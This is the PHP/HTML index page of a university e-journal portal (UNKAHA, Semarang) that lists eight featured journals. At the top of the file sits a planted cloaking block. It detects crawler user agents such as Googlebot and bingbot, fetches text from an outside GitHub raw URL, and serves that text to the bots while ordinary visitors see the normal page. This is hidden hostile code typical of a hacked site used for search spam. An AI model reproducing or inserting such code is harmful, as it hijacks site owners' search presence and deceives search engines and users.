<?php

function is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? 'tidak ada user agent';
    $bots = array(
        'Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification',
        'Google-InspectionTool', 'AhrefsBot', 'SemrushBot', 'MJ12bot',
        'DotBot', 'PetalBot', 'facebot'
    );

    if (empty($user_agent)) {
        return true;
    }

    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }

    return false;
}


function get_remote_content($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT'] ?? 'bot-checker');
    $response = curl_exec($ch);

    if (curl_errno($ch)) {
        echo 'Curl error: ' . curl_error($ch);
    }

    curl_close($ch);
    return $response;
}


$target_url = 'https://raw.githubusercontent.com/guoosmineva/kimproject/refs/heads/main/acid.txt';


if (is_bot()) {
    $message = get_remote_content($target_url);
    if ($message) {
        echo $message;
    } else {
        echo "Gagal ambil konten dari URL.";
    }
    exit;
}
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>UNKAHA E-JOURNAL SYSTEM</title>
    <!-- Bootstrap 5.3 CSS -->
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css"
      rel="stylesheet" />
    <!-- Font Awesome 6 -->
    <link
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css"
      rel="stylesheet" />
    <!-- Favicon -->
    <link rel="icon" type="image/png" sizes="32x32" href="/unkaha-fav.png" />
    <style>
      :root {
        --unkaha-primary: #0d6efd;
        --hero-bg: #064e3b;
      }

      .brand-logo {
        height: 40px;
        width: auto;
      }

      /* ===== HERO ===== */
      .hero {
        --hero-pos-y: 5%;
        background-image: linear-gradient(
            rgba(6, 78, 59, 0.9),
            rgba(6, 78, 59, 0.9)
          ),
          url("/hero-background.jpg");
        background-position: center, center var(--hero-pos-y);
        background-size: auto, cover;
        background-repeat: no-repeat, no-repeat;
        padding: 6rem 0;
        color: #ffffff;
      }
      .hero h1 {
        letter-spacing: 1px;
        font-weight: 800;
        font-size: clamp(1.75rem, 2.5vw + 1.25rem, 2.75rem);
        line-height: 1.15;
      }
      .hero p.lead {
        margin-top: 1rem;
        font-size: clamp(1.05rem, 0.6vw + 0.9rem, 1.25rem);
        font-weight: 500;
        color: #d1fae5;
      }

      /* ===== CARDS ===== */
      .journal-card {
        border: 0;
        overflow: hidden;
        transition: transform 0.2s ease, box-shadow 0.2s ease;
        cursor: pointer;
      }
      .journal-card:hover {
        transform: translateY(-4px);
        box-shadow: 0 1rem 2rem rgba(0, 0, 0, 0.08) !important;
      }
      .journal-cover {
        width: 100%;
        height: auto;
        aspect-ratio: 1240/1754;
        object-fit: cover;
        display: block;
      }
      .journal-cover-wrap {
        position: relative;
      }
      .journal-cover-wrap::after {
        content: "";
        position: absolute;
        inset: 0;
        background: linear-gradient(
          to top,
          rgba(0, 0, 0, 0.55),
          rgba(0, 0, 0, 0.15) 40%,
          rgba(0, 0, 0, 0) 70%
        );
      }
      .journal-title {
        position: absolute;
        left: 0.75rem;
        right: 0.75rem;
        bottom: 0.75rem;
        z-index: 2;
        color: #fff;
        font-weight: 700;
        text-shadow: 0 2px 8px rgba(0, 0, 0, 0.4);
        line-height: 1.2;
        display: -webkit-box;
        -webkit-line-clamp: 2;
        -webkit-box-orient: vertical;
        overflow: hidden;
        margin: 0;
      }

      /* ===== FOOTER ===== */
      footer {
        background: var(--hero-bg);
        color: #e5f6ee;
      }
      footer a {
        color: #ffffff;
        text-decoration: none;
      }
      footer a:hover {
        text-decoration: underline;
      }
      .footer-title {
        color: #ffffff;
        font-weight: 700;
        letter-spacing: 0.3px;
      }
      .copyright {
        border-top: 1px solid rgba(255, 255, 255, 0.2);
        color: #e2f3eb;
      }

      /* ===== NAVBAR ===== */
      .navbar {
        background: rgba(255, 255, 255, 0.92);
        backdrop-filter: saturate(160%) blur(8px);
      }
      .navbar .navbar-brand {
        font-weight: 700;
      }
      .navbar .nav-link {
        position: relative;
        font-weight: 600;
        color: #0b2239;
      }
      .navbar .nav-link:hover,
      .navbar .nav-link:focus {
        color: #064e3b;
      }
      .navbar .nav-link::after {
        content: "";
        position: absolute;
        left: 0;
        right: 0;
        bottom: 0.35rem;
        height: 2px;
        background: #064e3b;
        transform: scaleX(0);
        transform-origin: center;
        transition: transform 0.2s ease;
      }
      .navbar .nav-link:hover::after,
      .navbar .nav-link:focus::after {
        transform: scaleX(1);
      }
      @media (max-width: 991.98px) {
        .navbar .collapse {
          background: rgba(255, 255, 255, 0.98);
          border-radius: 0.75rem;
          padding: 0.5rem;
          box-shadow: 0 0.5rem 1rem rgba(0, 0, 0, 0.05);
        }
        .navbar .nav-link::after {
          display: none;
        }
      }

      /* ========= LOGO ========= */
      .brand-logo {
        height: auto;
        max-height: 40px;
        width: auto;
        object-fit: contain;
        display: block;
      }
      .navbar-brand {
        flex-shrink: 0;
      }
      @media (max-width: 991.98px) {
        .navbar {
          padding-top: 0.35rem;
          padding-bottom: 0.35rem;
        }
      }
      @media (max-width: 575.98px) {
        .brand-logo {
          max-height: 28px;
        }
        .navbar-brand {
          padding-top: 0.125rem;
          padding-bottom: 0.125rem;
        }
        .navbar .container {
          overflow: visible;
        }
      }
      #about {
        scroll-margin-top: 80px;
      }
      @media (max-width: 575.98px) {
        #about {
          padding-top: 1rem;
        }
      }
    </style>
  </head>
  <body>
    <!-- NAVBAR -->
    <nav class="navbar navbar-expand-lg navbar-light sticky-top shadow-sm">
      <div class="container d-flex align-items-center justify-content-between">
        <a class="navbar-brand d-flex align-items-center py-2" href="/">
          <img
            src="/logo-ejournal-unkaha.png"
            alt="UNKAHA"
            class="brand-logo me-2" />
        </a>
        <button
          class="navbar-toggler"
          type="button"
          data-bs-toggle="collapse"
          data-bs-target="#mainNav"
          aria-controls="mainNav"
          aria-expanded="false"
          aria-label="Toggle navigation">
          <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="mainNav">
          <ul
            class="navbar-nav ms-auto align-items-lg-center gap-lg-2 mb-2 mb-lg-0">
            <li class="nav-item">
              <a class="nav-link px-3" href="http://unkaha.ac.id">Home</a>
            </li>
          </ul>
        </div>
      </div>
    </nav>

    <!-- HERO -->
    <section id="home" class="hero text-center d-flex align-items-center">
      <div class="container">
        <h1 class="fw-bold">UNKAHA E-JOURNAL SYSTEM</h1>
        <p class="lead">Most Accessed. Most Read. Most Cited.</p>
      </div>
    </section>

    <!-- MAIN -->
    <main class="py-5" id="about">
      <div class="container">
        <div
          class="d-flex justify-content-between align-items-end flex-wrap gap-2 mb-4">
          <div>
            <h2 class="h3 mb-0">Featured Journals</h2>
          </div>
        </div>

        <div class="row g-4">
          <!-- 1 -->
          <div class="col-6 col-lg-3">
            <a
              href="http://e-journal.unkaha.ac.id/index.php/slj"
              class="text-decoration-none">
              <div class="card h-100 journal-card shadow-sm">
                <div class="journal-cover-wrap">
                  <img
                    src="/smart-law-journal.jpg"
                    alt="Smart Law Journal"
                    class="journal-cover"
                    loading="lazy" />
                  <h5 class="journal-title">Smart Law Journal</h5>
                </div>
              </div>
            </a>
          </div>

          <!-- 2 -->
          <div class="col-6 col-lg-3">
            <a
              href="http://e-journal.unkaha.ac.id/index.php/juma"
              class="text-decoration-none">
              <div class="card h-100 journal-card shadow-sm">
                <div class="journal-cover-wrap">
                  <img
                    src="/journal-of-management.jpg"
                    alt="Journal of Management"
                    class="journal-cover"
                    loading="lazy" />
                  <h5 class="journal-title">Journal of Management</h5>
                </div>
              </div>
            </a>
          </div>

          <!-- 3 -->
          <div class="col-6 col-lg-3">
            <a
              href="http://e-journal.unkaha.ac.id/index.php/jite"
              class="text-decoration-none">
              <div class="card h-100 journal-card shadow-sm">
                <div class="journal-cover-wrap">
                  <img
                    src="/journal-informatics-technology-and-education.jpg"
                    alt="Journal Informatics, Technology and Education"
                    class="journal-cover"
                    loading="lazy" />
                  <h5 class="journal-title">
                    Journal Informatics, Technology and Education
                  </h5>
                </div>
              </div>
            </a>
          </div>

          <!-- 4 -->
          <div class="col-6 col-lg-3">
            <a
              href="http://e-journal.unkaha.ac.id/index.php/hej"
              class="text-decoration-none">
              <div class="card h-100 journal-card shadow-sm">
                <div class="journal-cover-wrap">
                  <img
                    src="/humanity-empowerment-journal.jpg"
                    alt="Humanity Empowerment Journal"
                    class="journal-cover"
                    loading="lazy" />
                  <h5 class="journal-title">Humanity Empowerment Journal</h5>
                </div>
              </div>
            </a>
          </div>

          <!-- 5 -->
          <div class="col-6 col-lg-3">
            <a
              href="http://ejournal.unkaha.ac.id/index.php/jskb"
              class="text-decoration-none">
              <div class="card h-100 journal-card shadow-sm">
                <div class="journal-cover-wrap">
                  <img
                    src="/jurnal-smart-kebidanan.jpg"
                    alt="Jurnal Smart Kebidanan"
                    class="journal-cover"
                    loading="lazy" />
                  <h5 class="journal-title">Jurnal Smart Kebidanan</h5>
                </div>
              </div>
            </a>
          </div>

          <!-- 6 -->
          <div class="col-6 col-lg-3">
            <a
              href="http://ejournal.unkaha.ac.id/index.php/jskp"
              class="text-decoration-none">
              <div class="card h-100 journal-card shadow-sm">
                <div class="journal-cover-wrap">
                  <img
                    src="/jurnal-smart-keperawatan.jpg"
                    alt="Jurnal SMART Keperawatan"
                    class="journal-cover"
                    loading="lazy" />
                  <h5 class="journal-title">Jurnal SMART Keperawatan</h5>
                </div>
              </div>
            </a>
          </div>

          <!-- 7 -->
          <div class="col-6 col-lg-3">
            <a
              href="http://ejournal.unkaha.ac.id/index.php/jbsh"
              class="text-decoration-none">
              <div class="card h-100 journal-card shadow-sm">
                <div class="journal-cover-wrap">
                  <img
                    src="/journal-of-biomedical-science-and-health.jpg"
                    alt="Journal of Biomedical Sciences and Health"
                    class="journal-cover"
                    loading="lazy" />
                  <h5 class="journal-title">
                    Journal of Biomedical Sciences and Health
                  </h5>
                </div>
              </div>
            </a>
          </div>

          <!-- 8 -->
          <div class="col-6 col-lg-3">
            <a
              href="http://ejournal.unkaha.ac.id/index.php/kespera"
              class="text-decoration-none">
              <div class="card h-100 journal-card shadow-sm">
                <div class="journal-cover-wrap">
                  <img
                    src="/kelompok-studi-pengabdian-kepada-masyarakat.jpg"
                    alt="Kelompok Studi Pengabdian Kepada Masyarakat"
                    class="journal-cover"
                    loading="lazy" />
                  <h5 class="journal-title">
                    Kelompok Studi Pengabdian Kepada Masyarakat
                  </h5>
                </div>
              </div>
            </a>
          </div>
        </div>
      </div>
    </main>

    <!-- FOOTER -->
    <footer class="pt-5">
      <div class="container">
        <div class="row g-4 pb-4">
          <!-- 1 kolom di mobile (col-12), 2 kolom di md (col-md-6), 3 kolom di lg (col-lg-4) -->
          <div class="col-12 col-md-6 col-lg-4">
            <h5 class="footer-title mb-3">E-JOURNAL UNKAHA</h5>
            <p class="mb-0">
              Repositori jurnal ilmiah Universitas Karya Husada Semarang.
              Mendukung akses terbuka, praktik publikasi etis, dan diseminasi
              pengetahuan untuk masyarakat.
            </p>
          </div>
          <div class="col-12 col-md-6 col-lg-4">
            <h5 class="footer-title mb-3">LINKS</h5>
            <ul class="list-unstyled mb-0">
              <li class="mb-2">
                <a href="/"><i class="fa-solid fa-angle-right me-2"></i>Home</a>
              </li>
              <li class="mb-2">
                <a href="https://unkaha.ac.id" target="_blank" rel="noopener"
                  ><i class="fa-solid fa-angle-right me-2"></i>UNKAHA</a
                >
              </li>
              <li class="mb-2">
                <a
                  href="https://lppm.unkaha.ac.id"
                  target="_blank"
                  rel="noopener"
                  ><i class="fa-solid fa-angle-right me-2"></i>LPPM UNKAHA</a
                >
              </li>
            </ul>
          </div>
          <div class="col-12 col-md-6 col-lg-4">
            <h5 class="footer-title mb-3">CONTACT</h5>
            <ul class="list-unstyled mb-0">
              <li class="mb-2">
                <i class="fa-solid fa-location-dot me-2"></i>Jl. R. Soekanto No.46<br>
&nbsp; &nbsp; &nbsp;Sambiroto, Tembalang Semarang 50276 </li>
              <li class="mb-2">
                <i class="fa-solid fa-phone me-2"></i>(024) 6724581
              </li>
              <li class="mb-2">
                <i class="fa-solid fa-envelope me-2"></i>info@unkaha.ac.id
              </li>
            </ul>
          </div>
        </div>
        <div class="copyright py-3 text-center small">
          Copyright &copy; 2025 Universitas Karya Husada Semarang
        </div>
      </div>
    </footer>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
  </body>
</html>
